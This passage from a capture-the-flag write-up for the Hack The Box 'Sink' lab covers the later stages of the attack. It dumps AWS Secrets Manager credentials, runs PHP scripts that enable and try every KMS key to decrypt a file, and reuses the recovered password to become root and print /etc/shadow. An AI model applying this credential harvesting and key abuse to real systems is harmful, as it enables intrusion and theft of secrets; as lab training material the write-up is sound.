string(55) "{"username":"albert@sink.htb","password":"Welcome123!"}"
["VersionStages"]=>
array(1) {
[0]=>
string(10) "AWSCURRENT"
}
["CreatedDate"]=>
object(Aws\Api\DateTimeResult)#131 (3) {
["date"]=>
string(26) "2021-02-06 20:18:57.000000"
["timezone_type"]=>
int(1)
["timezone"]=>
string(6) "+00:00"
}
["@metadata"]=>
array(4) {
["statusCode"]=>
int(200)
["effectiveUri"]=>
string(21) "http://127.0.0.1:4566"
["headers"]=>
array(9) {
["content-type"]=>
string(24) "text/html; charset=utf-8"
["content-length"]=>
string(3) "296"
["access-control-allow-origin"]=>
string(1) "*"
["access-control-allow-methods"]=>
string(38) "HEAD,GET,PUT,POST,DELETE,OPTIONS,PATCH"
["access-control-allow-headers"]=>
string(196) "authorization,content-type,content-md5,cache-control,x-amz-content-sha256,x-amz-date,x-amz-security-token,x-amz-user-agent,x-amz-target,x-amz-acl,x-amz-version-id,x-localstack-target,x-amz-tagging"
["access-control-expose-headers"]=>
string(16) "x-amz-version-id"
["connection"]=>
string(5) "close"
["date"]=>
string(29) "Mon, 08 Feb 2021 10:54:15 GMT"
["server"]=>
string(13) "hypercorn-h11"
}
["transferStats"]=>
array(1) {
["http"]=>
array(1) {
[0]=>
array(0) {
}
}
}
}
}
["monitoringEvents":"Aws\Result":private]=>
array(0) {
}
}
object(Aws\Result)#135 (2) {
["data":"Aws\Result":private]=>
array(7) {
["ARN"]=>
string(69) "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-GoJSC"
["Name"]=>
string(12) "Jira Support"
["VersionId"]=>
string(36) "8dfff6f9-3250-4577-9f57-f5e945c828ba"
["SecretString"]=>
string(59) "{"username":"david@sink.htb","password":"EALB=bcC=`a7f2#k"}"
["VersionStages"]=>
array(1) {
[0]=>
string(10) "AWSCURRENT"
}
["CreatedDate"]=>
object(Aws\Api\DateTimeResult)#140 (3) {
["date"]=>
string(26) "2021-02-06 20:18:57.000000"
["timezone_type"]=>
int(1)
["timezone"]=>
string(6) "+00:00"
}
["@metadata"]=>
array(4) {
["statusCode"]=>
int(200)
["effectiveUri"]=>
string(21) "http://127.0.0.1:4566"
["headers"]=>
array(9) {
["content-type"]=>
string(24) "text/html; charset=utf-8"
["content-length"]=>
string(3) "304"
["access-control-allow-origin"]=>
string(1) "*"
["access-control-allow-methods"]=>
string(38) "HEAD,GET,PUT,POST,DELETE,OPTIONS,PATCH"
["access-control-allow-headers"]=>
string(196) "authorization,content-type,content-md5,cache-control,x-amz-content-sha256,x-amz-date,x-amz-security-token,x-amz-user-agent,x-amz-target,x-amz-acl,x-amz-version-id,x-localstack-target,x-amz-tagging"
["access-control-expose-headers"]=>
string(16) "x-amz-version-id"
["connection"]=>
string(5) "close"
["date"]=>
string(29) "Mon, 08 Feb 2021 10:54:16 GMT"
["server"]=>
string(13) "hypercorn-h11"
}
["transferStats"]=>
array(1) {
["http"]=>
array(1) {
[0]=>
array(0) {
}
}
}
}
}
["monitoringEvents":"Aws\Result":private]=>
array(0) {
}
}

Collected credentials:

{"username":"john@sink.htb","password":"R);\)ShS99mZ~8j"}
{"username":"albert@sink.htb","password":"Welcome123!"}
{"username":"david@sink.htb","password":"EALB=bcC=`a7f2#k"}

david

The Secrets Manager output gives david's password; switch to david:

marcus@sink:~$ su david
Password:
david@sink:/home/marcus$ id
uid=1000(david) gid=1000(david) groups=1000(david)
david@sink:/home/marcus$ whoami
david

servers.enc

david has an encrypted servers.enc file; decrypting it again goes through AWS, this time KMS:

david@sink:~$ cd Projects/
david@sink:~/Projects$ ls
Prod_Deployment
david@sink:~/Projects$ cd Prod_Deployment/
david@sink:~/Projects/Prod_Deployment$ ls
servers.enc
david@sink:~/Projects/Prod_Deployment$ cat servers.enc
$j�p����8=R]=�µ+�,�gS��I=�7�▒�S�.ɒ`�46Z]���F�C����t(�{���?]!��Ci�5�V'�E����?�r�{3�r�\�)�{�#��(j�,.�$�X#D�r��_8\�Z»q<�o���*��<����'â0R/Z��<y�B�#
Y|�4�9�U�ݠ~��\M��"a�q�▒a
����Ļ;U���/2��둲Q�HL"S�{��
쯮��CCx�8룘u�Y����z��j?�y�����z� ���1w9�EV��\�T
F)c@�9s▒/�����?ġ����g�����Z���1��8;��o�:��'�����l剺��O���A!}�v�,��9H#Q�w�▒1������5Vt��6���d���5�&�$���hKY!$MPI�$z��MU��/?7�L��M*�ſ▒�david@sink:~/Projects/Prod_Deployment$

listkeys

The project ships a listkeys script. It errors out as-is: change `version` to `latest` and set the credentials and endpoint as in the previous scripts:

  • listkeys1.php
<?php
require 'vendor/autoload.php';

use Aws\Kms\KmsClient;
use Aws\Exception\AwsException;

// 'version' => 'latest' is the fix for the error the shipped script throws.
$KmsClient = new KmsClient([
    'version'     => 'latest',
    'region'      => 'eu',
    'credentials' => [
        'key'    => 'AKIAIUEN3QWCPSTEITJQ',
        'secret' => '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'
    ],
    'endpoint'    => 'http://127.0.0.1:4566'
]);

$limit = 100;

try {
    // ListKeys only returns KeyId/KeyArn pairs; it says nothing about which
    // key encrypted servers.enc, hence the try-every-key loop in decrypt.php.
    $result = $KmsClient->listKeys([
        'Limit' => $limit,
    ]);
    var_dump($result);
} catch (AwsException $e) {
    echo $e->getMessage();
    echo "\n";
}

Run the PHP script, keeping only the key IDs:

┌──(root💀kali)-[~/hackthebox/machine/sink]
└─# php listkeys1.php | grep "string(36)" | cut -d " " -f 10
"0b539917-5eff-45b2-9fa1-e13f0d2c42ac"
"16754494-4333-4f77-ad4c-d0b73d799939"
"2378914f-ea22-47af-8b0c-8252ef09cd5f"
"2bf9c582-eed7-482f-bfb6-2e4e7eb88b78"
"53bb45ef-bf96-47b2-a423-74d9b89a297a"
"804125db-bdf1-465a-a058-07fc87c0fad0"
"837a2f6e-e64c-45bc-a7aa-efa56a550401"
"881df7e3-fb6f-4c7b-9195-7f210e79e525"
"c5217c17-5675-42f7-a6ec-b5aa9b9dbbde"
"f0579746-10c3-4fd1-b2ab-f312a5a0f3fc"
"f2358fef-e813-4c59-87c8-70e50f6d4f70"

decrypt

  • decrypt.php
<?php
require 'vendor/autoload.php';

use Aws\Kms\KmsClient;
use Aws\Exception\AwsException;

$KmsClient = new KmsClient([
    'version'     => 'latest',
    'region'      => 'eu',
    'credentials' => [
        'key'    => 'AKIAIUEN3QWCPSTEITJQ',
        'secret' => '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'
    ],
    'endpoint'    => 'http://127.0.0.1:4566'
]);

// Key IDs from the listkeys1.php output above.
$keys = [
    "0b539917-5eff-45b2-9fa1-e13f0d2c42ac",
    "16754494-4333-4f77-ad4c-d0b73d799939",
    "2378914f-ea22-47af-8b0c-8252ef09cd5f",
    "2bf9c582-eed7-482f-bfb6-2e4e7eb88b78",
    "53bb45ef-bf96-47b2-a423-74d9b89a297a",
    "804125db-bdf1-465a-a058-07fc87c0fad0",
    "837a2f6e-e64c-45bc-a7aa-efa56a550401",
    "881df7e3-fb6f-4c7b-9195-7f210e79e525",
    "c5217c17-5675-42f7-a6ec-b5aa9b9dbbde",
    "f0579746-10c3-4fd1-b2ab-f312a5a0f3fc",
    "f2358fef-e813-4c59-87c8-70e50f6d4f70"
];
// Base64 of servers.enc.
$cipherb64 = "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";

foreach ($keys as $keyId) {
    try {
        // Enable the key first in case it is disabled; these credentials allow it.
        $KmsClient->enableKey([
            'KeyId' => $keyId,
        ]);
        // Asymmetric KMS decrypt needs the KeyId and the algorithm spelled out.
        // A key that did not encrypt this blob throws, and the catch moves on.
        $result = $KmsClient->decrypt([
            'CiphertextBlob'      => base64_decode($cipherb64),
            'KeyId'               => $keyId,
            'EncryptionAlgorithm' => 'RSAES_OAEP_SHA_256',
        ]);
        echo base64_encode($result['Plaintext']) . "\n";
    } catch (AwsException $e) {
        // wrong key (or wrong algorithm for it): try the next one
    }
}

Run the PHP script; exactly one key decrypts the blob:

┌──(root💀kali)-[~/hackthebox/machine/sink]
└─# php decrypt.php
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

servers.yml

Base64-decode the output and gunzip it: the result is a tar archive containing servers.yml (plus a servers.sig), and servers.yml holds a password:

Decode with the online CyberChef:

CyberChef recipe URL:

https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)Gunzip()&input=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

CyberChef output (a raw tar, so the header padding renders as dots; the two members are shown here):

servers.yml (root:root, 0644):
server:
  listenaddr: ""
  port: 80
  hosts:
    - certs.sink.htb
    - vault.sink.htb
  defaultuser:
    name: admin
    pass: _uezduQ!EY5AHfe2

servers.sig (root:root, 0644): binary signature, not printable
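The same unpacking done in code rather than in CyberChef, as an added example (not from the writeup): base64, then gzip, then tar, checking each layer's magic before trusting it, and pulling `defaultuser` out of servers.yml with plain string handling so nothing outside the standard library is needed. The real blob is not reproduced on the page, so `build_sample_blob()` constructs an equivalent archive from the servers.yml shown above with a zero-filled placeholder for servers.sig; `unpack_blob()` is the part you would point at the actual decrypt.php output.

```python
"""Turn the KMS plaintext (base64 of a .tar.gz) into credentials."""
import base64
import gzip
import io
import tarfile

# servers.yml as recovered in the writeup; the signature is a constructed stand-in.
SERVERS_YML = b"""server:
  listenaddr: ""
  port: 80
  hosts:
    - certs.sink.htb
    - vault.sink.htb
  defaultuser:
    name: admin
    pass: _uezduQ!EY5AHfe2
"""
SERVERS_SIG = b"\x00" * 64   # placeholder, not the real signature


def build_sample_blob() -> str:
    """Constructed input: a ustar archive with both members, gzipped and base64'd."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz", format=tarfile.USTAR_FORMAT) as tar:
        for name, data in (("servers.yml", SERVERS_YML), ("servers.sig", SERVERS_SIG)):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return base64.b64encode(buf.getvalue()).decode()


def unpack_blob(blob_b64: str) -> dict:
    """base64 -> gzip -> tar, returning {member name: bytes} for regular files."""
    raw = base64.b64decode(blob_b64)
    if raw[:2] != b"\x1f\x8b":
        raise ValueError("not gzip data")
    data = gzip.decompress(raw)
    if data[257:262] != b"ustar":          # the magic CyberChef showed at the member headers
        raise ValueError("not a tar archive")
    members = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:") as tar:
        for member in tar.getmembers():
            if member.isfile():             # skip directories, links and devices
                members[member.name] = tar.extractfile(member).read()
    return members


def default_user(yml_text: str) -> dict:
    """Collect the key/value pairs nested under 'defaultuser:' by indentation."""
    creds, inside, base = {}, False, 0
    for line in yml_text.splitlines():
        stripped = line.strip()
        indent = len(line) - len(line.lstrip())
        if stripped == "defaultuser:":
            inside, base = True, indent
            continue
        if inside:
            if not stripped or indent <= base:   # back out of the mapping
                break
            key, _, value = stripped.partition(":")
            creds[key.strip()] = value.strip()
    return creds


def recover_credentials(blob_b64: str) -> dict:
    members = unpack_blob(blob_b64)
    return default_user(members["servers.yml"].decode())


if __name__ == "__main__":
    print(recover_credentials(build_sample_blob()))  # {'name': 'admin', 'pass': '_uezduQ!EY5AHfe2'}
```

With the real output, `recover_credentials(open("plaintext.b64").read())` replaces the sample; the magic checks are what tell you early whether the KMS plaintext is the archive you expect or just another layer of encoding.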

get root

name: admin
pass: _uezduQ!EY5AHfe2

That password is also root's password; su to root and read root.txt:

david@sink:~$ su root
Password:
root@sink:/home/david# id
uid=0(root) gid=0(root) groups=0(root)
root@sink:/home/david# whoami
root
root@sink:/home/david# cd
root@sink:~# ls
automation desync docker-compose.yml root.txt snap
root@sink:~# cat root.txt
5e3a99117cded05e500c24e3160cdf27
root@sink:~# cat /etc/shadow | grep root
root:$6$PYtd2G7mK9kPLNkn$9kn.hmGZhQ1Am5Pyi2.o.Lt6k7ned9iHRyXIu4yg28NkHW0UTf9IaZ7NA7P5spZJK9CDIYYnW9P1najKD8ETA.:18598:0:99999:7:::

Summary of knowledge

  • Request smuggling (CVE-2019-18277, HAProxy in front of Gunicorn) captures the admin's request and with it the admin's session cookie
  • Password reuse across systems (the Dev Node password opens Gitea; the decrypted admin password is root's)
  • The leaked AWS access key and secret against Secrets Manager yield more credentials
  • Enumerating KMS keys and trying each one decrypts the .enc file
  • CyberChef Base64 + Gunzip on the plaintext recovers the final credentials

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…